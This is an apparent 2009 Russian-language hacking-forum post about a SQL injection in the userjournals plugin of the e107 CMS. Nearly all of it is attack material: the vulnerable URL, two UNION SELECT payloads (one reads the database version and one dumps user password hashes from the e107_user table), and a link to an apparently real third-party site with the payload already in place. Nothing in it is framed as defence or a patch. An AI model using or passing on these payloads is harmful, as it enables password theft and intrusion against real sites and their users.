08.11.2009, 19:12
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]
1:
Код:
-1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
2:
Код:
-1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--
|
|
|